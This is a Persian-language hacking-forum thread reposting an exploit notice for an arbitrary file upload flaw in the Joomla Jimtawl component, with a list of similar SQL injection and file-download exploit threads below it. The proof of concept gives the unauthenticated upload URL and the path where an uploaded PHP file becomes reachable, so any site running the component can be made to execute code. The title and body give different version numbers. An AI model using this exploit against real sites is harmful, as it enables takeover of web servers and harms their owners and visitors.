رتبه موضوع:
  • 0 رای - 0 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload
#1
Icon35 
کد:
# # # # #
# Exploit Title: Joomla! Component Jimtawl 2.2.5 - Arbitrary File Upload
# Dork: N/A
# Date: 01.02.2018
# Vendor Homepage: http://janguo.de/
# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/streaming-a-broadcasting/jimtawl/
# Software Download: http://janguo.de/lang-en/joomla-25-higher/jimtawl/pkg_jimtawl-2-2-5-current-r561-zip.raw
# Version: 2.2.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker upload arbitrary file....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jimtawl&view=upload&task=upload&pop=true&tmpl=component
#
# http://localhost/[PATH]/media/efe_1517496506.php
#
# # # # #
------------=========تاپیک سوالات کاربران==========------------

http://forum.iranhack.com/thread-3197.html

------------========Hash-Cracking Requests========------------

http://forum.iranhack.com/thread-3204.html
پاسخ }}
سپاس شده توسط:


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
Icon36 Joomla! Component Saxum Numerology 3.0.4 - SQL Injection SafeMaster 0 43 دیروز، 11:10 صبح
آخرین ارسال: SafeMaster
  Joomla! Component SquadManagement 1.0.3 - SQL Injection SafeMaster 0 22 دیروز، 11:09 صبح
آخرین ارسال: SafeMaster
Icon35 Joomla! Component Saxum Picker 3.2.10 - SQL Injection SafeMaster 0 22 دیروز، 11:08 صبح
آخرین ارسال: SafeMaster
Icon35 Joomla! Component JSP Tickets 1.1 - SQL Injection SafeMaster 0 276 18 بهمن 1396، 05:59 عصر
آخرین ارسال: SafeMaster
Icon35 Joomla! Component JoomRecipe 1.0.3 - SQL Injection SafeMaster 0 2,068 2 تير 1396، 12:56 صبح
آخرین ارسال: SafeMaster
  WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload Mr.XpR 0 789 9 شهريور 1394، 05:31 صبح
آخرین ارسال: Mr.XpR
Icon010 Joomla Helpdesk Pro XSS / File Disclosure / SQL Injection Irhblackhat 0 871 31 تير 1394، 04:45 صبح
آخرین ارسال: Irhblackhat
  WordPress S3Bubble Cloud Video Analytics 0.7 - Arbitrary File Downloa Mr.XpR 0 902 19 تير 1394، 01:42 عصر
آخرین ارسال: Mr.XpR
Icon36 WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download Mr.XpR 0 814 19 تير 1394، 01:40 عصر
آخرین ارسال: Mr.XpR

پرش به انجمن:


کاربران در حال بازدید این موضوع: 1 مهمان